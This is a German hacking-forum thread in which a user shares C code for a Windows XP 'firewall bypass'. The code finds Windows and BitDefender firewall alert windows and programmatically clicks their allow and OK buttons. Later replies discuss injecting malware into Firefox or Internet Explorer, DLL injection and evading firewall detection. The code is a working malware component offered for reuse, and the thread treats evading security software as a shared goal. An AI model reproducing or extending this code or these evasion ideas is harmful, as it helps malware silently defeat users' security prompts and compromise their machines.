Ein super einfacher Firewallbypass (WinXP)

  • Den habe ich gerade in meinem Archiv gefunden^^


    [html]
    #ifndef NO_BYPASS


    DWORD WINAPI BypassThread(LPVOID)
    {
    while(1)
    {
    HWND wnd = 0;

    if( (wnd = fFindWindow(0, "Windows Security Alert")) )
    {
    // Click the "allow" button.
    fSendMessage(wnd, WM_COMMAND, MAKEWORD(104,BN_CLICKED ), 0);
    // wait for the window to close
    while( fIsWindow(wnd) ) Sleep(50);
    break;
    }
    else if( (wnd = fFindWindow(0, "BitDefender Firewall Alert")) )
    {
    // Click the "remember" button (Doesn't work right now)
    fSendMessage(wnd, WM_COMMAND, MAKEWORD(13133, BN_CLICKED ), 0);
    // Click the okay button
    fSendMessage(wnd, WM_COMMAND, MAKEWORD(IDOK,BN_CLICKED ), 0);
    // Wait for the window to close
    while( fIsWindow(wnd) ) Sleep(50);
    break;
    }
    Sleep(30); // Don't use 100% CPU
    }
    return 0;
    }
    #endif
    [/html]
    Der Code ist gut kommentiert, ich kann euch das aber nochmal kurz erläutern.


    Also:
    Wenn ein Fenster mit dem Namen "Windows Security Alert" oder "BitDefender Firewall Alert" gefunden wird, wird das weggeklickt (also der Button der das ganze Storniert wird angeklickt).
    Kann natürlich auch noch leicht erweitert werden^^


    Mfg
    jerman08

  • nicht schlecht die idee, aber dann müsste man ja für jede Firewall das ganze erweitern, da wäre es besser das ganze in einen anderen prozess (Firefox, IE) zu injizieren und dann würde halt die firewall melden dass Firefox/IE ins internet will und die meisten würden dann auch das ganze zulassen. Aber trotzdem danke für den Code. :D


    greets
    r1cky

  • Zitat von r1cky;14622

    nicht schlecht die idee, aber dann müsste man ja für jede Firewall das ganze erweitern, da wäre es besser das ganze in einen anderen prozess (Firefox, IE) zu injizieren und dann würde halt die firewall melden dass Firefox/IE ins internet will und die meisten würden dann auch das ganze zulassen. Aber trotzdem danke für den Code. :D


    greets
    r1cky


    Ã?hm aus welchem Zeitalter kommst du denn?:D
    Das mit dem Injizieren in den Browser hat mal vor n Paar Jahren ganz gut gefuntzt. Jedoch erkennt nun so zimich jede Firewall, ob Maleware injiziert wurde. Dll injection is da entwas wirkungsvoller, aber auch oft erkannt.
    EBFE hat auf Codesoft mal n ganz schönes PoC zum Thema FWB mit get/setthreadcontext gemacht. Allerdings war das auch detected...
    Also keine einfache Gschichte.

    [CENTER]Aktuelles Projekt:

    Status: 5%
    Real Coder doesn't code Visual Basic. Real Coder codes Opcodes.[/CENTER]

  • dem etwas älteren zeitalter :D
    ne aber so ist das mit allem, jedes mal wenn du mit etwas neuem raus kommst wird es auch irgendwann wieder detected sein, so ist das halt :D aber in den browser injizieren war mal gut, wie gesagt WAR :D


    greets
    r1cky